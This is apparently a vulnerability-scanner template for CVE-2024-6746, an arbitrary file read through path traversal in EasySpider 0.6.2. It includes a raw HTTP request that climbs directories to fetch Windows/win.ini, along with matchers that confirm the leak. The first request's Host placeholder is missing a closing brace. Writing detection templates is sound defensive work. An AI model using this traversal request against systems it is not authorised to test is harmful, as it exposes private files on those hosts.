CVE-2024-6746: EasySpider 0.6.2 - Arbitrary File Read

id: CVE-2024-6746

info:
  name: EasySpider 0.6.2 - Arbitrary File Read
  author: s4e-io
  severity: medium
  description: |
    A vulnerability classified as problematic was found in NaiboWang EasySpider 0.6.2 on Windows. Affected by this vulnerability is an unknown functionality of the file \EasySpider\resources\app\server.js of the component HTTP GET Request Handler. The manipulation with the input /../../../../../../../../../Windows/win.ini leads to path traversal: '../filedir'. The attack needs to be done within the local network.
  reference:
    - https://github.com/NaiboWang/EasySpider/issues/466
    - https://cvefeed.io/vuln/detail/CVE-2024-6746
    - https://vuldb.com/?id.271477
    - https://vuldb.com/?submit.371998
    - https://vuldb.com/?ctiid.271477
    - https://github.com/NaiboWang/EasySpider
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2024-6746
    cwe-id: CWE-24
    epss-score: 0.77088
    epss-percentile: 0.9893
  metadata:
    vendor: naibowang
    product: easyspider
  tags: cve,cve2024,lfi,network

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /taskGrid/tasklist.html HTTP/1.1
        Host: {{Hostname}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"Task List","Task ID","Task Name","URL","<title>任务列表 | Task List</title>")'
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        GET /../../../../../../../../../Windows/win.ini HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"bit app support","fonts","extensions")'
          - "status_code == 200"
        condition: and
# digest: 490a0046304402202c4e453ec5df7a9f20e2435b002bb51e827759dfce754dae19c38d03e2321894022069d68849fc140a958aecdb8c742586a51c8d67cfb4bb0f095e976aa16a29d6f3:922c64590222798bb761d5b6d8e72950